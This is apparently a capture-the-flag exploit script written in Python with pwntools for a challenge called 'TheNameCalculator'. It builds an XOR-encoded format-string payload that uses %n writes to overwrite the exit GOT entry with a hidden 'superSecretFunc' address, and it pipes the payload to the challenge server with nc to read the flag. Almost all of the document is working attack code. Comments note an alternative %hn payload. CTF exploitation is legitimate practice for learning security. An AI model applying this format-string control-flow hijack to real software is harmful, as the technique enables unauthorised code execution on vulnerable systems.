```
from pwn import *
# author: conghiaa [email protected]
# The trick to recv data from server very large bytes: python TheNameCalculator.py | nc chal.noxale.com 5678 > res.t
# read flag: tail --bytes=500 ./res.t
def decode(s):
""" xor word from right to left each time shift a byte"""
key = 0x5f7b4153
# print s.encode('hex')
for i in range(len(s) - 4, -1, -1):
word = u32(s[i:i+4])
word ^= key
word = p32(word)
s = s[:i] + word + s[i+4:]
# print s.encode('hex')
return s

# def padding(s):
# if len(s)%4 == 0:
# return ""
# else:
# return 'X'*(4 - len(s)%4)

exit = 0x0804a024
backdoor = 0x08048596 # superSecretFunc
name = p32(0x6a4b825).rjust(0x20, 'X')

nameAgain = p32(exit) + '%{}x'.format(backdoor - 4) +'%12$n'
# nameAgain = p32(exit + 2) + '%{}x'.format(0x0804 - 4) +'%12$hn' # write 0x804
# pad = padding(nameAgain)
# nameAgain += pad
# nameAgain += p32(exit) + '%{}x'.format(0x8596 - 0x804 - len(pad) - 4) + '%{}$hn'.format(len(nameAgain)/4 + 12) # write 0x8596
# Note: the commented payload doesn't work due to limitation of read chars but you can circumvent it by placing exit addr at the first-asked name.

payload = name + decode(nameAgain)
print payload
```